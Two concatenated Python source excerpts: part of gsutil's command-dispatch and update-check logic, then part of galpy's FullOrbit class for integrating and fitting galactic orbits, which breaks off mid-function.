args: Command-line args (arg0 = actual arg, not command name ala bash).
headers: Dictionary containing optional HTTP headers to pass to boto.
debug: Debug level to pass in to boto connection (range 0..3).
parallel_operations: Should command operations be executed in parallel?
test_method: Optional general purpose method for testing purposes.
Application and semantics of this method will vary by
command and test type.
skip_update_check: Set to True to disable checking for gsutil updates.
logging_filters: Optional list of logging.Filters to apply to this
command's logger.
do_shutdown: Stop all parallelism framework workers iff this is True.
Raises:
CommandException: if errors encountered.
Returns:
Return value(s) from Command that was run.
"""
if (not skip_update_check and
self.MaybeCheckForAndOfferSoftwareUpdate(command_name, debug)):
command_name = 'update'
args = ['-n']
if not args:
args = []
# Include api_version header in all commands.
api_version = boto.config.get_value('GSUtil', 'default_api_version', '1')
if not headers:
headers = {}
headers['x-goog-api-version'] = api_version
if command_name not in self.command_map:
close_matches = difflib.get_close_matches(
command_name, self.command_map.keys(), n=1)
if close_matches:
# Instead of suggesting a deprecated command alias, suggest the new
# name for that command.
translated_command_name = (
OLD_ALIAS_MAP.get(close_matches[0], close_matches)[0])
print >> sys.stderr, 'Did you mean this?'
print >> sys.stderr, '\t%s' % translated_command_name
elif command_name == 'update' and gslib.IS_PACKAGE_INSTALL:
sys.stderr.write(
'Update command is not supported for package installs; '
'please instead update using your package manager.')
raise CommandException('Invalid command "%s".' % command_name)
if '--help' in args:
new_args = [command_name]
original_command_class = self.command_map[command_name]
subcommands = original_command_class.help_spec.subcommand_help_text.keys()
for arg in args:
if arg in subcommands:
new_args.append(arg)
break # Take the first match and throw away the rest.
args = new_args
command_name = 'help'
args = HandleArgCoding(args)
command_class = self.command_map[command_name]
command_inst = command_class(
self, args, headers, debug, parallel_operations,
self.bucket_storage_uri_class, self.gsutil_api_class_map_factory,
test_method, logging_filters, command_alias_used=command_name)
return_code = command_inst.RunCommand()
if MultiprocessingIsAvailable()[0] and do_shutdown:
ShutDownGsutil()
if GetFailureCount() > 0:
return_code = 1
return return_code
def MaybeCheckForAndOfferSoftwareUpdate(self, command_name, debug):
"""Checks the last time we checked for an update and offers one if needed.
    An offer is made if the time since the last update check is longer
    than the configured threshold.
Args:
command_name: The name of the command being run.
debug: Debug level to pass in to boto connection (range 0..3).
Returns:
True if the user decides to update.
"""
# Don't try to interact with user if:
# - gsutil is not connected to a tty (e.g., if being run from cron);
# - user is running gsutil -q
# - user is running the config command (which could otherwise attempt to
# check for an update for a user running behind a proxy, who has not yet
# configured gsutil to go through the proxy; for such users we need the
# first connection attempt to be made by the gsutil config command).
# - user is running the version command (which gets run when using
# gsutil -D, which would prevent users with proxy config problems from
# sending us gsutil -D output).
# - user is running the update command (which could otherwise cause an
# additional note that an update is available when user is already trying
# to perform an update);
# - user specified gs_host (which could be a non-production different
# service instance, in which case credentials won't work for checking
# gsutil tarball).
# - user is using a Cloud SDK install (which should only be updated via
# gcloud components update)
logger = logging.getLogger()
gs_host = boto.config.get('Credentials', 'gs_host', None)
if (not IsRunningInteractively()
or command_name in ('config', 'update', 'ver', 'version')
or not logger.isEnabledFor(logging.INFO)
or gs_host
or os.environ.get('CLOUDSDK_WRAPPER') == '1'):
return False
software_update_check_period = boto.config.getint(
'GSUtil', 'software_update_check_period', 30)
# Setting software_update_check_period to 0 means periodic software
# update checking is disabled.
if software_update_check_period == 0:
return False
cur_ts = int(time.time())
if not os.path.isfile(LAST_CHECKED_FOR_GSUTIL_UPDATE_TIMESTAMP_FILE):
# Set last_checked_ts from date of VERSION file, so if the user installed
# an old copy of gsutil it will get noticed (and an update offered) the
# first time they try to run it.
last_checked_ts = GetGsutilVersionModifiedTime()
with open(LAST_CHECKED_FOR_GSUTIL_UPDATE_TIMESTAMP_FILE, 'w') as f:
f.write(str(last_checked_ts))
else:
try:
with open(LAST_CHECKED_FOR_GSUTIL_UPDATE_TIMESTAMP_FILE, 'r') as f:
last_checked_ts = int(f.readline())
except (TypeError, ValueError):
return False
if (cur_ts - last_checked_ts
> software_update_check_period * SECONDS_PER_DAY):
# Create a credential-less gsutil API to check for the public
# update tarball.
gsutil_api = GcsJsonApi(self.bucket_storage_uri_class, logger,
credentials=NoOpCredentials(), debug=debug)
cur_ver = LookUpGsutilVersion(gsutil_api, GSUTIL_PUB_TARBALL)
with open(LAST_CHECKED_FOR_GSUTIL_UPDATE_TIMESTAMP_FILE, 'w') as f:
f.write(str(cur_ts))
(g, m) = CompareVersions(cur_ver, gslib.VERSION)
if m:
print '\n'.join(textwrap.wrap(
'A newer version of gsutil (%s) is available than the version you '
'are running (%s). NOTE: This is a major new version, so it is '
'strongly recommended that you review the release note details at '
'%s before updating to this version, especially if you use gsutil '
'in scripts.' % (cur_ver, gslib.VERSION, RELEASE_NOTES_URL)))
if gslib.IS_PACKAGE_INSTALL:
return False
print
answer = raw_input('Would you like to update [y/N]? ')
return answer and answer.lower()[0] == 'y'
elif g:
print '\n'.join(textwrap.wrap(
'A newer version of gsutil (%s) is available than the version you '
'are running (%s). A detailed log of gsutil release changes is '
'available at %s if you would like to read them before updating.'
% (cur_ver, gslib.VERSION, RELEASE_NOTES_URL)))
if gslib.IS_PACKAGE_INSTALL:
return False
print
answer = raw_input('Would you like to update [Y/n]? ')
return not answer or answer.lower()[0] != 'n'
return False
|
|
import warnings
import copy
import math as m
import numpy as nu
from scipy import integrate, optimize
import scipy
if int(scipy.__version__.split('.')[1]) < 10: #pragma: no cover
from scipy.maxentropy import logsumexp
else:
from scipy.misc import logsumexp
from galpy.potential_src.Potential import evaluateRforces, evaluatezforces,\
evaluatePotentials, evaluatephiforces, evaluateDensities
from galpy.util import galpyWarning
import galpy.util.bovy_plot as plot
import galpy.util.bovy_symplecticode as symplecticode
import galpy.util.bovy_coords as coords
#try:
from galpy.orbit_src.integrateFullOrbit import integrateFullOrbit_c, _ext_loaded
ext_loaded= _ext_loaded
from galpy.util.bovy_conversion import physical_conversion
from galpy.orbit_src.OrbitTop import OrbitTop
_ORBFITNORMRADEC= 360.
_ORBFITNORMDIST= 10.
_ORBFITNORMPMRADEC= 4.
_ORBFITNORMVLOS= 200.
class FullOrbit(OrbitTop):
"""Class that holds and integrates orbits in full 3D potentials"""
def __init__(self,vxvv=[1.,0.,0.9,0.,0.1],vo=220.,ro=8.0,zo=0.025,
solarmotion=nu.array([-10.1,4.0,6.7])):
"""
NAME:
__init__
PURPOSE:
           initialize a full orbit
INPUT:
vxvv - initial condition [R,vR,vT,z,vz,phi]
vo - circular velocity at ro (km/s)
ro - distance from vantage point to GC (kpc)
zo - offset toward the NGP of the Sun wrt the plane (kpc)
solarmotion - value in [-U,V,W] (km/s)
OUTPUT:
(none)
HISTORY:
2010-08-01 - Written - Bovy (NYU)
2014-06-11 - Added conversion kwargs to physical coordinates - Bovy (IAS)
"""
OrbitTop.__init__(self,vxvv=vxvv,
ro=ro,zo=zo,vo=vo,solarmotion=solarmotion)
return None
def integrate(self,t,pot,method='symplec4_c',dt=None):
"""
NAME:
integrate
PURPOSE:
integrate the orbit
INPUT:
t - list of times at which to output (0 has to be in this!)
pot - potential instance or list of instances
method= 'odeint' for scipy's odeint
'leapfrog' for a simple leapfrog implementation
'leapfrog_c' for a simple leapfrog implementation in C
'rk4_c' for a 4th-order Runge-Kutta integrator in C
'rk6_c' for a 6-th order Runge-Kutta integrator in C
'dopr54_c' for a Dormand-Prince integrator in C (generally the fastest)
dt= (None) if set, force the integrator to use this basic stepsize; must be an integer divisor of output stepsize
OUTPUT:
           (none) (get the actual orbit using getOrbit())
HISTORY:
2010-08-01 - Written - Bovy (NYU)
"""
#Reset things that may have been defined by a previous integration
if hasattr(self,'_orbInterp'): delattr(self,'_orbInterp')
if hasattr(self,'rs'): delattr(self,'rs')
self.t= nu.array(t)
self._pot= pot
self.orbit= _integrateFullOrbit(self.vxvv,pot,t,method,dt)
@physical_conversion('energy')
def Jacobi(self,*args,**kwargs):
"""
NAME:
Jacobi
PURPOSE:
calculate the Jacobi integral of the motion
INPUT:
           OmegaP= pattern speed of rotating frame
t= time
pot= potential instance or list of such instances
OUTPUT:
Jacobi integral
HISTORY:
2011-04-18 - Written - Bovy (NYU)
"""
if not 'OmegaP' in kwargs or kwargs['OmegaP'] is None:
OmegaP= 1.
if not 'pot' in kwargs or kwargs['pot'] is None:
try:
pot= self._pot
except AttributeError:
raise AttributeError("Integrate orbit or specify pot=")
else:
pot= kwargs['pot']
if isinstance(pot,list):
for p in pot:
if hasattr(p,'OmegaP'):
OmegaP= p.OmegaP()
break
else:
if hasattr(pot,'OmegaP'):
OmegaP= pot.OmegaP()
kwargs.pop('OmegaP',None)
else:
OmegaP= kwargs.pop('OmegaP')
#Make sure you are not using physical coordinates
old_physical= kwargs.get('use_physical',None)
kwargs['use_physical']= False
if not isinstance(OmegaP,(int,float)) and len(OmegaP) == 3:
if isinstance(OmegaP,list): thisOmegaP= nu.array(OmegaP)
else: thisOmegaP= OmegaP
out= self.E(*args,**kwargs)-nu.dot(thisOmegaP,
self.L(*args,**kwargs).T).T
else:
out= self.E(*args,**kwargs)-OmegaP*self.L(*args,**kwargs)[:,2]
if not old_physical is None:
kwargs['use_physical']= old_physical
else:
kwargs.pop('use_physical')
return out
@physical_conversion('energy')
def E(self,*args,**kwargs):
"""
NAME:
E
PURPOSE:
calculate the energy
INPUT:
t - (optional) time at which to get the energy
pot= potential instance or list of such instances
OUTPUT:
energy
HISTORY:
2010-09-15 - Written - Bovy (NYU)
"""
if not 'pot' in kwargs or kwargs['pot'] is None:
try:
pot= self._pot
except AttributeError:
raise AttributeError("Integrate orbit or specify pot=")
if 'pot' in kwargs and kwargs['pot'] is None:
kwargs.pop('pot')
else:
pot= kwargs.pop('pot')
if len(args) > 0:
t= args[0]
else:
t= 0.
#Get orbit
thiso= self(*args,**kwargs)
onet= (len(thiso.shape) == 1)
if onet:
return evaluatePotentials(thiso[0],thiso[3],pot,
phi=thiso[5],t=t)\
+thiso[1]**2./2.\
+thiso[2]**2./2.\
+thiso[4]**2./2.
else:
return nu.array([evaluatePotentials(thiso[0,ii],thiso[3,ii],
pot,phi=thiso[5,ii],
t=t[ii])\
+thiso[1,ii]**2./2.\
+thiso[2,ii]**2./2.\
+thiso[4,ii]**2./2. for ii in range(len(t))])
@physical_conversion('energy')
def ER(self,*args,**kwargs):
"""
NAME:
ER
PURPOSE:
calculate the radial energy
INPUT:
t - (optional) time at which to get the energy
pot= potential instance or list of such instances
OUTPUT:
radial energy
HISTORY:
2013-11-30 - Written - Bovy (IAS)
"""
if not 'pot' in kwargs or kwargs['pot'] is None:
try:
pot= self._pot
except AttributeError:
raise AttributeError("Integrate orbit or specify pot=")
if 'pot' in kwargs and kwargs['pot'] is None:
kwargs.pop('pot')
else:
pot= kwargs.pop('pot')
if len(args) > 0:
t= args[0]
else:
t= 0.
#Get orbit
thiso= self(*args,**kwargs)
onet= (len(thiso.shape) == 1)
if onet:
return evaluatePotentials(thiso[0],0.,pot,
phi=thiso[5],t=t)\
+thiso[1]**2./2.\
+thiso[2]**2./2.
else:
return nu.array([evaluatePotentials(thiso[0,ii],0.,
pot,phi=thiso[5,ii],
t=t[ii])\
+thiso[1,ii]**2./2.\
+thiso[2,ii]**2./2. for ii in range(len(t))])
@physical_conversion('energy')
def Ez(self,*args,**kwargs):
"""
NAME:
Ez
PURPOSE:
calculate the vertical energy
INPUT:
t - (optional) time at which to get the energy
pot= potential instance or list of such instances
OUTPUT:
vertical energy
HISTORY:
2013-11-30 - Written - Bovy (IAS)
"""
if not 'pot' in kwargs or kwargs['pot'] is None:
try:
pot= self._pot
except AttributeError:
raise AttributeError("Integrate orbit or specify pot=")
if 'pot' in kwargs and kwargs['pot'] is None:
kwargs.pop('pot')
else:
pot= kwargs.pop('pot')
if len(args) > 0:
t= args[0]
else:
t= 0.
#Get orbit
thiso= self(*args,**kwargs)
onet= (len(thiso.shape) == 1)
if onet:
return evaluatePotentials(thiso[0],thiso[3],pot,
phi=thiso[5],t=t)\
-evaluatePotentials(thiso[0],0.,pot,
phi=thiso[5],t=t)\
+thiso[4]**2./2.
else:
return nu.array([evaluatePotentials(thiso[0,ii],thiso[3,ii],
pot,phi=thiso[5,ii],
t=t[ii])\
-evaluatePotentials(thiso[0,ii],0.,
pot,phi=thiso[5,ii],
t=t[ii])\
+thiso[4,ii]**2./2. for ii in range(len(t))])
def e(self,analytic=False,pot=None):
"""
NAME:
e
PURPOSE:
calculate the eccentricity
INPUT:
analytic - compute this analytically
pot - potential to use for analytical calculation
OUTPUT:
eccentricity
HISTORY:
2010-09-15 - Written - Bovy (NYU)
"""
if analytic:
self._setupaA(pot=pot,type='adiabatic')
(rperi,rap)= self._aA.calcRapRperi(self)
return (rap-rperi)/(rap+rperi)
if not hasattr(self,'orbit'):
raise AttributeError("Integrate the orbit first")
if not hasattr(self,'rs'):
self.rs= nu.sqrt(self.orbit[:,0]**2.+self.orbit[:,3]**2.)
return (nu.amax(self.rs)-nu.amin(self.rs))/(nu.amax(self.rs)+nu.amin(self.rs))
@physical_conversion('position')
def rap(self,analytic=False,pot=None,**kwargs):
"""
NAME:
rap
PURPOSE:
return the apocenter radius
INPUT:
analytic - compute this analytically
pot - potential to use for analytical calculation
OUTPUT:
R_ap
HISTORY:
2010-09-20 - Written - Bovy (NYU)
"""
if analytic:
self._setupaA(pot=pot,type='adiabatic')
(rperi,rap)= self._aA.calcRapRperi(self)
return rap
if not hasattr(self,'orbit'):
raise AttributeError("Integrate the orbit first")
if not hasattr(self,'rs'):
self.rs= nu.sqrt(self.orbit[:,0]**2.+self.orbit[:,3]**2.)
return nu.amax(self.rs)
@physical_conversion('position')
def rperi(self,analytic=False,pot=None,**kwargs):
"""
NAME:
rperi
PURPOSE:
return the pericenter radius
INPUT:
analytic - compute this analytically
pot - potential to use for analytical calculation
OUTPUT:
R_peri
HISTORY:
2010-09-20 - Written - Bovy (NYU)
"""
if analytic:
self._setupaA(pot=pot,type='adiabatic')
(rperi,rap)= self._aA.calcRapRperi(self)
return rperi
if not hasattr(self,'orbit'):
raise AttributeError("Integrate the orbit first")
if not hasattr(self,'rs'):
self.rs= nu.sqrt(self.orbit[:,0]**2.+self.orbit[:,3]**2.)
return nu.amin(self.rs)
@physical_conversion('position')
def zmax(self,analytic=False,pot=None,**kwargs):
"""
NAME:
zmax
PURPOSE:
return the maximum vertical height
INPUT:
analytic - compute this analytically
pot - potential to use for analytical calculation
OUTPUT:
Z_max
HISTORY:
2010-09-20 - Written - Bovy (NYU)
2012-06-01 - Added analytic calculation - Bovy (IAS)
"""
if analytic:
self._setupaA(pot=pot,type='adiabatic')
zmax= self._aA.calczmax(self)
return zmax
if not hasattr(self,'orbit'):
raise AttributeError("Integrate the orbit first")
return nu.amax(nu.fabs(self.orbit[:,3]))
def fit(self,vxvv,vxvv_err=None,pot=None,radec=False,lb=False,
customsky=False,lb_to_customsky=None,pmllpmbb_to_customsky=None,
tintJ=10,ntintJ=1000,integrate_method='dopr54_c',
disp=False,
**kwargs):
"""
NAME:
fit
PURPOSE:
fit an Orbit to data using the current orbit as the initial
condition
INPUT:
vxvv - [:,6] array of positions and velocities along the orbit
vxvv_err= [:,6] array of errors on positions and velocities along the orbit (if None, these are set to 0.01)
pot= Potential to fit the orbit in
Keywords related to the input data:
radec= if True, input vxvv and vxvv_err are [ra,dec,d,mu_ra, mu_dec,vlos] in [deg,deg,kpc,mas/yr,mas/yr,km/s] (all J2000.0; mu_ra = mu_ra * cos dec); the attributes of the current Orbit are used to convert between these coordinates and Galactocentric coordinates
lb= if True, input vxvv and vxvv_err are [long,lat,d,mu_ll, mu_bb,vlos] in [deg,deg,kpc,mas/yr,mas/yr,km/s] (mu_ll = mu_ll * cos lat); the attributes of the current Orbit are used to convert between these coordinates and Galactocentric coordinates
           customsky= if True, input vxvv and vxvv_err are [custom long,custom lat,d,mu_customll, mu_custombb,vlos] in [deg,deg,kpc,mas/yr,mas/yr,km/s] (mu_ll = mu_ll * cos lat) where custom longitude and custom latitude are a custom set of sky coordinates (e.g., ecliptic) and the proper motions are also expressed in these coordinates; you need to provide the functions lb_to_customsky and pmllpmbb_to_customsky to convert to the custom sky coordinates (these should have the same inputs and outputs as lb_to_radec and pmllpmbb_to_pmrapmdec); the attributes of the current Orbit are used to convert between these coordinates and Galactocentric coordinates
obs=[X,Y,Z,vx,vy,vz] - (optional) position and velocity of observer
(in kpc and km/s) (default=Object-wide default)
Cannot be an Orbit instance with the orbit of the reference point, as w/ the ra etc. functions
ro= distance in kpc corresponding to R=1. (default: taken from object)
vo= velocity in km/s corresponding to v=1. (default: taken from object)
lb_to_customsky= function that converts l,b,degree=False to the custom sky coordinates (like lb_to_radec); needs to be given when customsky=True
pmllpmbb_to_customsky= function that converts pmll,pmbb,l,b,degree=False to proper motions in the custom sky coordinates (like pmllpmbb_to_pmrapmdec); needs to be given when customsky=True
Keywords related to the orbit integrations:
tintJ= (default: 10) time to integrate orbits for fitting the orbit
ntintJ= (default: 1000) number of time-integration points
integrate_method= (default: 'dopr54_c') integration method to use
disp= (False) display the optimizer's convergence message
OUTPUT:
max of log likelihood
HISTORY:
2014-06-17 - Written - Bovy (IAS)
TEST:
from galpy.potential import LogarithmicHaloPotential; lp= LogarithmicHaloPotential(normalize=1.); from galpy.orbit import Orbit; o= Orbit(vxvv=[1.,0.1,1.1,0.1,0.02,0.]); ts= numpy.linspace(0,10,1000); o.integrate(ts,lp); outts= [0.,0.1,0.2,0.3,0.4]; vxvv= numpy.array([o.R(outts),o.vR(outts),o.vT(outts),o.z(outts),o.vz(outts),o.phi(outts)]).T; of= Orbit(vxvv=[1.02,0.101,1.101,0.101,0.0201,0.001]); of._orb.fit(vxvv,pot=lp,radec=False,tintJ=10,ntintJ=1000)
"""
if pot is None:
try:
pot= self._pot
except AttributeError:
raise AttributeError("Integrate orbit first or specify pot=")
if radec or lb or customsky:
obs, ro, vo= self._parse_radec_kwargs(kwargs,vel=True,dontpop=True)
else:
obs, ro, vo= None, None, None
if customsky \
and (lb_to_customsky is None or pmllpmbb_to_customsky is None):
raise IOError('if customsky=True, the functions lb_to_customsky and pmllpmbb_to_customsky need to be given')
new_vxvv, maxLogL= _fit_orbit(self,vxvv,vxvv_err,pot,radec=radec,lb=lb,
customsky=customsky,
lb_to_customsky=lb_to_customsky,
pmllpmbb_to_customsky=pmllpmbb_to_customsky,
tintJ=tintJ,ntintJ=ntintJ,
integrate_method=integrate_method,
ro=ro,vo=vo,obs=obs,disp=disp)
#Setup with these new initial conditions
self.vxvv= new_vxvv
return maxLogL
def plotEz(self,*args,**kwargs):
"""
NAME:
plotEz
PURPOSE:
plot Ez(.) along the orbit
INPUT:
bovy_plot.bovy_plot inputs
OUTPUT:
figure to output device
HISTORY:
2014-06-16 - Written - Bovy (IAS)
"""
if kwargs.pop('normed',False):
kwargs['d2']= 'Eznorm'
else:
kwargs['d2']= 'Ez'
self.plot(*args,**kwargs)
def plotER(self,*args,**kwargs):
"""
NAME:
plotER
PURPOSE:
plot ER(.) along the orbit
INPUT:
bovy_plot.bovy_plot inputs
OUTPUT:
figure to output device
HISTORY:
2014-06-16 - Written - Bovy (IAS)
"""
if kwargs.pop('normed',False):
kwargs['d2']= 'ERnorm'
else:
kwargs['d2']= 'ER'
self.plot(*args,**kwargs)
def plotEzJz(self,*args,**kwargs):
"""
NAME:
plotEzJz
PURPOSE:
plot E_z(.)/sqrt(dens(R)) along the orbit
INPUT:
pot= Potential instance or list of instances in which the orbit was
integrated
d1= - plot Ez vs d1: e.g., 't', 'z', 'R', 'vR', 'vT', 'vz'
+bovy_plot.bovy_plot inputs
OUTPUT:
figure to output device
HISTORY:
2010-08-08 - Written - Bovy (NYU)
"""
labeldict= {'t':r'$t$','R':r'$R$','vR':r'$v_R$','vT':r'$v_T$',
'z':r'$z$','vz':r'$v_z$','phi':r'$\phi$',
'x':r'$x$','y':r'$y$','vx':r'$v_x$','vy':r'$v_y$'}
if not 'pot' in kwargs:
try:
pot= self._pot
except AttributeError:
raise AttributeError("Integrate orbit first or specify pot=")
else:
pot= kwargs.pop('pot')
d1= kwargs.pop('d1','t')
self.EzJz= [(evaluatePotentials(self.orbit[ii,0],self.orbit[ii,3],
pot,t=self.t[ii])-
evaluatePotentials(self.orbit[ii,0],0.,pot,
phi= self.orbit[ii,5],t=self.t[ii])+
self.orbit[ii,4]**2./2.)/\
nu.sqrt(evaluateDensities(self.orbit[ii,0],0.,pot,phi=self.orbit[ii,5],t=self.t[ii]))\
for ii in range(len(self.t))]
if not 'xlabel' in kwargs:
kwargs['xlabel']= labeldict[d1]
if not 'ylabel' in kwargs:
kwargs['ylabel']= r'$E_z/\sqrt{\rho}$'
if d1 == 't':
plot.bovy_plot(nu.array(self.t),nu.array(self.EzJz)/self.EzJz[0],
*args,**kwargs)
elif d1 == 'z':
plot.bovy_plot(self.orbit[:,3],nu.array(self.EzJz)/self.EzJz[0],
*args,**kwargs)
elif d1 == 'R':
plot.bovy_plot(self.orbit[:,0],nu.array(self.EzJz)/self.EzJz[0],
*args,**kwargs)
elif d1 == 'vR':
plot.bovy_plot(self.orbit[:,1],nu.array(self.EzJz)/self.EzJz[0],
*args,**kwargs)
elif d1 == 'vT':
plot.bovy_plot(self.orbit[:,2],nu.array(self.EzJz)/self.EzJz[0],
*args,**kwargs)
elif d1 == 'vz':
plot.bovy_plot(self.orbit[:,4],nu.array(self.EzJz)/self.EzJz[0],
*args,**kwargs)
def _integrateFullOrbit(vxvv,pot,t,method,dt):
"""
NAME:
_integrateFullOrbit
PURPOSE:
integrate an orbit in a Phi(R,z,phi) potential
INPUT:
vxvv - array with the initial conditions stacked like
[R,vR,vT,z,vz,phi]; vR outward!
pot - Potential instance
t - list of times at which to output (0 has to be in this!)
method - 'odeint' or 'leapfrog'
dt - if set, force the integrator to use this basic stepsize; must be an integer divisor of output stepsize
OUTPUT:
[:,5] array of [R,vR,vT,z,vz,phi] at each t
HISTORY:
2010-08-01 - Written - Bovy (NYU)
"""
#First check that the potential has C
if '_c' in method:
if isinstance(pot,list):
allHasC= nu.prod([p.hasC for p in pot])
else:
allHasC= pot.hasC
if not allHasC and ('leapfrog' in method or 'symplec' in method):
method= 'leapfrog'
elif not allHasC:
method= 'odeint'
if method.lower() == 'leapfrog':
#go to the rectangular frame
this_vxvv= nu.array([vxvv[0]*nu.cos(vxvv[5]),
vxvv[0]*nu.sin(vxvv[5]),
vxvv[3],
vxvv[1]*nu.cos(vxvv[5])-vxvv[2]*nu.sin(vxvv[5]),
vxvv[2]*nu.cos(vxvv[5])+vxvv[1]*nu.sin(vxvv[5]),
vxvv[4]])
#integrate
out= symplecticode.leapfrog(_rectForce,this_vxvv,
t,args=(pot,),rtol=10.**-8)
#go back to the cylindrical frame
R= nu.sqrt(out[:,0]**2.+out[:,1]**2.)
phi= nu.arccos(out[:,0]/R)
phi[(out[:,1] < 0.)]= 2.*nu.pi-phi[(out[:,1] < 0.)]
vR= out[:,3]*nu.cos(phi)+out[:,4]*nu.sin(phi)
vT= out[:,4]*nu.cos(phi)-out[:,3]*nu.sin(phi)
out[:,3]= out[:,2]
out[:,4]= out[:,5]
out[:,0]= R
out[:,1]= vR
out[:,2]= vT
out[:,5]= phi
elif ext_loaded and \
(method.lower() == 'leapfrog_c' or method.lower() == 'rk4_c' \
or method.lower() == 'rk6_c' or method.lower() == 'symplec4_c' \
or method.lower() == 'symplec6_c' or method.lower() == 'dopr54_c'):
warnings.warn("Using C implementation to integrate orbits",
galpyWarning)
#go to the rectangular frame
this_vxvv= nu.array([vxvv[0]*nu.cos(vxvv[5]),
vxvv[0]*nu.sin(vxvv[5]),
vxvv[3],
vxvv[1]*nu.cos(vxvv[5])-vxvv[2]*nu.sin(vxvv[5]),
vxvv[2]*nu.cos(vxvv[5])+vxvv[1]*nu.sin(vxvv[5]),
vxvv[4]])
#integrate
tmp_out, msg= integrateFullOrbit_c(pot,this_vxvv,
t,method,dt=dt)
#go back to the cylindrical frame
R= nu.sqrt(tmp_out[:,0]**2.+tmp_out[:,1]**2.)
phi= nu.arccos(tmp_out[:,0]/R)
phi[(tmp_out[:,1] < 0.)]= 2.*nu.pi-phi[(tmp_out[:,1] < 0.)]
vR= tmp_out[:,3]*nu.cos(phi)+tmp_out[:,4]*nu.sin(phi)
vT= tmp_out[:,4]*nu.cos(phi)-tmp_out[:,3]*nu.sin(phi)
out= nu.zeros((len(t),6))
out[:,0]= R
out[:,1]= vR
out[:,2]= vT
out[:,5]= phi
out[:,3]= tmp_out[:,2]
out[:,4]= tmp_out[:,5]
elif method.lower() == 'odeint' or not ext_loaded:
vphi= vxvv[2]/vxvv[0]
init= [vxvv[0],vxvv[1],vxvv[5],vphi,vxvv[3],vxvv[4]]
intOut= integrate.odeint(_FullEOM,init,t,args=(pot,),
rtol=10.**-8.)#,mxstep=100000000)
out= nu.zeros((len(t),6))
out[:,0]= intOut[:,0]
out[:,1]= intOut[:,1]
out[:,2]= out[:,0]*intOut[:,3]
out[:,3]= intOut[:,4]
out[:,4]= intOut[:,5]
out[:,5]= intOut[:,2]
#post-process to remove negative radii
neg_radii= (out[:,0] < 0.)
out[neg_radii,0]= -out[neg_radii,0]
out[neg_radii,5]+= m.pi
return out
def _FullEOM(y,t,pot):
"""
NAME:
_FullEOM
PURPOSE:
implements the EOM, i.e., the right-hand side of the differential
equation
INPUT:
y - current phase-space position
t - current time
pot - (list of) Potential instance(s)
OUTPUT:
dy/dt
HISTORY:
2010-04-16 - Written - Bovy (NYU)
"""
l2= (y[0]**2.*y[3])**2.
return [y[1],
l2/y[0]**3.+evaluateRforces(y[0],y[4],pot,phi=y[2],t=t),
y[3],
1./y[0]**2.*(evaluatephiforces(y[0],y[4],pot,phi=y[2],t=t)-
2.*y[0]*y[1]*y[3]),
y[5],
evaluatezforces(y[0],y[4],pot,phi=y[2],t=t)]
def _rectForce(x,pot,t=0.):
"""
NAME:
_rectForce
PURPOSE:
returns the force in the rectangular frame
INPUT:
x - current position
t - current time
pot - (list of) Potential instance(s)
OUTPUT:
force
HISTORY:
2011-02-02 - Written - Bovy (NYU)
"""
#x is rectangular so calculate R and phi
R= nu.sqrt(x[0]**2.+x[1]**2.)
phi= nu.arccos(x[0]/R)
sinphi= x[1]/R
cosphi= x[0]/R
if x[1] < 0.: phi= 2.*nu.pi-phi
#calculate forces
Rforce= evaluateRforces(R,x[2],pot,phi=phi,t=t)
phiforce= evaluatephiforces(R,x[2],pot,phi=phi,t=t)
return nu.array([cosphi*Rforce-1./R*sinphi*phiforce,
sinphi*Rforce+1./R*cosphi*phiforce,
evaluatezforces(R,x[2],pot,phi=phi,t=t)])
def _fit_orbit(orb,vxvv,vxvv_err,pot,radec=False,lb=False,
customsky=False,lb_to_customsky=None,
pmllpmbb_to_customsky=None,
tintJ=100,ntintJ=1000,integrate_method='dopr54_c',
ro=None,vo=None,obs=None,disp=False):
"""Fit an orbit to data in a given potential"""
#Import here, because otherwise there is an infinite loop of imports
from galpy.actionAngle import actionAngleIsochroneApprox
    #Mock this up, because we want to use its orbit-integration routines
class mockActionAngleIsochroneApprox(actionAngleIsochroneApprox):
def __init__(self,tintJ,ntintJ,pot,integrate_method='dopr54_c'):
self._tintJ= tintJ
self._ntintJ=ntintJ
self._tsJ= nu.linspace(0.,self._tintJ,self._ntintJ)
self._pot= pot
self._integrate_method= integrate_method
return None
tmockAA= mockActionAngleIsochroneApprox(tintJ,ntintJ,pot,
integrate_method=integrate_method)
opt_vxvv= optimize.fmin_powell(_fit_orbit_mlogl,orb.vxvv,
args=(vxvv,vxvv_err,pot,radec,lb,
customsky,lb_to_customsky,
pmllpmbb_to_customsky,
tmockAA,
ro,vo,obs),
disp=disp)
maxLogL= -_fit_orbit_mlogl(opt_vxvv,vxvv,vxvv_err,pot,radec,lb,
customsky,lb_to_customsky,pmllpmbb_to_customsky,
tmockAA,
ro,vo,obs)
return (opt_vxvv,maxLogL)
def _fit_orbit_mlogl(new_vxvv,vxvv,vxvv_err,pot,radec,lb,
customsky,lb_to_customsky,pmllpmbb_to_customsky,
tmockAA,
ro,vo,obs):
"""The log likelihood for fitting an orbit"""
#Use this _parse_args routine, which does forward and backward integration
iR,ivR,ivT,iz,ivz,iphi= tmockAA._parse_args(True,False,
new_vxvv[0],
new_vxvv[1],
new_vxvv[2],
new_vxvv[3],
new_vxvv[4],
new_vxvv[5])
if radec or lb or customsky:
#Need to transform to (l,b), (ra,dec), or a custom set
#First transform to X,Y,Z,vX,vY,vZ (Galactic)
X,Y,Z = coords.galcencyl_to_XYZ(iR.flatten(),iphi.flatten(),
iz.flatten(),
Xsun=obs[0]/ro,
Ysun=obs[1]/ro,
Zsun=obs[2]/ro)
vX,vY,vZ = coords.galcencyl_to_vxvyvz(ivR.flatten(),ivT.flatten(),
ivz.flatten(),iphi.flatten(),
vsun=nu.array(\
obs[3:6])/vo)
bad_indx= (X == 0.)*(Y == 0.)*(Z == 0.)
if True in bad_indx: X[bad_indx]+= ro/10000.
lbdvrpmllpmbb= coords.rectgal_to_sphergal(X*ro,Y*ro,Z*ro,
vX*vo,vY*vo,vZ*vo,
degree=True)
if lb:
orb_vxvv= nu.array([lbdvrpmllpmbb[:,0],
lbdvrpmllpmbb[:,1],
lbdvrpmllpmbb[:,2],
lbdvrpmllpmbb[:,4],
lbdvrpmllpmbb[:,5],
lbdvrpmllpmbb[:,3]]).T
elif radec:
#Further transform to ra,dec,pmra,pmdec
radec= coords.lb_to_radec(lbdvrpmllpmbb[:,0],
lbdvrpmllpmbb[:,1],degree=True)
pmrapmdec= coords.pmllpmbb_to_pmrapmdec(lbdvrpmllpmbb[:,4],
lbdvrpmllpmbb[:,5],
lbdvrpmllpmbb[:,0],
lbdvrpmllpmbb[:,1],
degree=True)
orb_vxvv= nu.array([radec[:,0],radec[:,1],
